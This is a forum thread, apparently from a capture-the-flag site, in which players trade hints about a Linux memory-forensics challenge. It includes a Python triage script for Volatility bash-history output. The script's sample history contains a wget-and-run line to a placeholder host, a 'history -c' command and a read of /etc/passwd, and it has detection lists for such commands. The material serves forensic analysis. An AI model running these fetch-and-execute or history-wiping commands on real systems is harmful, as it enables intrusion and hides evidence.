Forget Me Not

@narwhal2 said:

For those having issues with the tool to remember things, check the version you are using. I found it works in 2.6 but not 2.4.

Using 2.6.1, needed to make some adjustments in the tool for it to be able to extract files.

Could someone leave a hint on which file I should be looking at? There are so many files

I’m losing my marbles on this one. I’ve tried the tool on a number of platforms (due to errors) and finally got it running on a fresh Kali VM, using a fork that supposedly addresses the issues I was running into with the stock version. I’m able to extract most of the filesystem, though many (not all) files I’m curious about appear to be zero filled. I’ve also used a separate tool for file carving to see if I missed anything. Still no luck. Anyone willing to lend a nudge?

Ok, tried everything on the extract tool but I still get nothing. I think I will need a hint :neutral:

I found a troll flag too (this_is_not…). If anyone has any hints for next steps, I’d appreciate it!

I might have forgotten something, but you don’t need to extract any files.

When you go through the information you can get, just make sure you double-check everything against a few different sources. Don’t make the mistake I made of googling it and thinking it was a rabbit hole. Look at some other places you can search for that kind of thing which you might use if you were an incident responder.

Well there is like 3 fake flags in this challenge :neutral:

@xInSanity said:

Well there is like 3 fake flags in this challenge :neutral:

Me too, so confused!

This challenge could have been much more interesting or related to a more realistic scenario. It does not happen every day that you can analyze a Linux memory dump obtained in the wild. :neutral:

Hey,

I saw people talking about the version being important. I use 4.6.1. Quite a lot of the files are empty, but not all. Is this expected behaviour? And also, am I just supposed to look in random files for a flag?

@DrDingDong said:

Hey,

I saw people talking about the version being important. I use 4.6.1. Quite a lot of the files are empty, but not all. Is this expected behaviour? And also, am I just supposed to look in random files for a flag?

Not sure what version you mean. There is enough info in the download to build what you need.

You don’t need to look in random files. I’d suggest you run some basic analysis and see what it gives you. If you find something interesting, look into what it is.

Frustratingly, I found the thing I needed almost instantly but it then took me days to realise. I could have got blood if I wasn’t an idiot. Don’t be me. Look at what you find.

I mean the version of the tool for analyzing which people refer to having problems with. I got it up and running and can analyze the dump and for example read the usual file which contains stuff about what has been performed. I’ll keep looking, thanks :slight_smile:

@DrDingDong said:

I mean the version of the tool for analyzing which people refer to having problems with. I got it up and running and can analyze the dump and for example read the usual file which contains stuff about what has been performed. I’ll keep looking, thanks :slight_smile:

I think I used version 2.6 or whatever is default in Kali.

You might have seen what you need to see. Look into all the information that gives.

Okay thanks, I’ll look some more :slight_smile:

Thanks to @TazWake for a hint about the very last thing. I do not quite get that very last part. The rest was good fun :slight_smile:

Anyone can help me?
I am stuck in the extract part now. Which plugin should I use to get some useful hints?
All plugins were analyzed, but there was no useful information.
Please ping me.

@pouerccat said:

Anyone can help me?
I am stuck in the extract part now. Which plugin should I use to get some useful hints?
All plugins were analyzed, but there was no useful information.
Please ping me.

Same here, aargh. Probably overlooking something, as others have said but pretty much stuck.

@Hackdoos said:

@pouerccat said:

Anyone can help me?
I am stuck in the extract part now. Which plugin should I use to get some useful hints?
All plugins were analyzed, but there was no useful information.
Please ping me.

Same here, aargh. Probably overlooking something, as others have said but pretty much stuck.

You are almost certainly overlooking it. I did for days on end because it is not obvious and, other than frustration, I can’t see a way you would try what you need to do. There is no obvious reason to do it.

So, if you’ve run the plugins you will have a mess of data. Start working through it and be sure you can say you have fully searched it. For example, don’t just put things into Google; look at other platforms you might consider as an incident responder.

Don’t assume that, just because something is generated by what looks like an arbitrary command, it doesn’t mean anything.
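The advice in the two replies above (run the basic plugins, then actually work through the "mess of data" they produce, paying attention to odd-looking commands and pivoting on anything you extract in the platforms an incident responder would use) is the kind of triage that is easy to script. The block below is an added example written for this thread; it is not code from the thread, the challenge, or the Volatility project. It assumes the column layout Volatility 2 prints for its `linux_bash` plugin (Pid, Name, Command Time, Command) and runs over a constructed sample of that output embedded in the file, not over the challenge dump. It parses the history, decodes base64 blobs that appear as command arguments, flags fetch-and-execute one-liners and history-clearing commands, and computes a SHA-256 of each decoded payload so you have something concrete to look up on a threat-intelligence platform rather than in a search engine.

```python
"""Triage of Volatility 2 `linux_bash` plugin output (added example).

Assumed output layout: `Pid  Name  Command Time  Command`, with a ruler line
after the header, as Volatility 2 prints it. SAMPLE_LINUX_BASH is constructed
for this example and is not from any real memory image.
"""
import base64
import binascii
import hashlib
import re
import shlex
from dataclasses import dataclass

# Constructed sample in the shape of `vol.py --profile=<profile> -f <dump> linux_bash`.
SAMPLE_LINUX_BASH = """\
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1337 bash                 2019-03-19 10:05:21 UTC+0000   ls -la /tmp
    1337 bash                 2019-03-19 10:05:40 UTC+0000   echo aGVsbG8gZnJvbSBiYXNoIGhpc3Rvcnk= | base64 -d
    1337 bash                 2019-03-19 10:06:02 UTC+0000   wget http://example.invalid/payload.sh -O /tmp/.p && bash /tmp/.p
    1337 bash                 2019-03-19 10:06:30 UTC+0000   history -c
    2048 bash                 2019-03-19 10:07:11 UTC+0000   cat /etc/passwd
"""


@dataclass
class BashEntry:
    pid: int
    name: str
    time: str
    command: str


# One history record per line; header and ruler lines do not start with a PID.
LINE_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<name>\S+)\s+"
    r"(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC[+-]\d{4})\s+(?P<cmd>.*)$"
)
# A standalone base64 token: long enough to be worth decoding, padded correctly.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
ANTI_FORENSICS = ("history -c", "unset HISTFILE", "HISTSIZE=0", ".bash_history")
NET_FETCH = {"wget", "curl"}
EXEC_WORDS = {"bash", "sh", "python", "perl"}


def parse_linux_bash(text: str) -> list[BashEntry]:
    """Turn linux_bash plugin output into records, skipping header and ruler lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(BashEntry(int(m["pid"]), m["name"], m["time"], m["cmd"].rstrip()))
    return entries


def decode_base64_token(token: str):
    """Return decoded bytes if the token is well-formed base64, else None."""
    if not B64_RE.match(token) or len(token) % 4:
        return None
    try:
        return base64.b64decode(token, validate=True)
    except binascii.Error:
        return None


def triage(entries: list[BashEntry]) -> list[dict]:
    """Flag encoded arguments, fetch-and-execute chains and history tampering."""
    findings = []
    for e in entries:
        try:
            tokens = shlex.split(e.command)
        except ValueError:  # unbalanced quotes in a partially recovered line
            tokens = e.command.split()
        for tok in tokens:
            raw = decode_base64_token(tok)
            if raw is not None:
                findings.append({
                    "pid": e.pid, "time": e.time, "kind": "base64", "command": e.command,
                    "decoded": raw.decode("utf-8", "replace"),
                    # Hash of the decoded payload: the value to pivot on elsewhere.
                    "sha256": hashlib.sha256(raw).hexdigest(),
                })
        if any(marker in e.command for marker in ANTI_FORENSICS):
            findings.append({"pid": e.pid, "time": e.time, "kind": "anti-forensics",
                             "command": e.command})
        if NET_FETCH & set(tokens) and EXEC_WORDS & set(tokens):
            findings.append({"pid": e.pid, "time": e.time, "kind": "fetch-and-execute",
                             "command": e.command})
    return findings


if __name__ == "__main__":
    for f in triage(parse_linux_bash(SAMPLE_LINUX_BASH)):
        print(f"[{f['kind']}] pid={f['pid']} {f['time']}: {f['command']}")
        if f["kind"] == "base64":
            print(f"    decoded={f['decoded']!r} sha256={f['sha256']}")
```

To use it against a real image, replace the constructed sample with the saved output of the plugin (`vol.py --profile=<profile> -f <dump> linux_bash > bash.txt`, with the profile built from the kernel details shipped in the download) and read the file into `parse_linux_bash`. The hash it prints for each decoded blob is deliberately the thing you carry to other platforms: a file hash or decoded string that returns nothing in a web search may still be known to a malware or threat-intel service, which is the "other places an incident responder would look" point made above.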

I read over the forum, and that was the same way I went.
So you guys say there is the flag, just the noise is too big? I have ideas which way is the best to approach this incident, but I can’t see the flag…

Guys,
the tool we need to use is the usual memory forensic tool V******y, right?
What exactly should I start looking for? Some file to extract?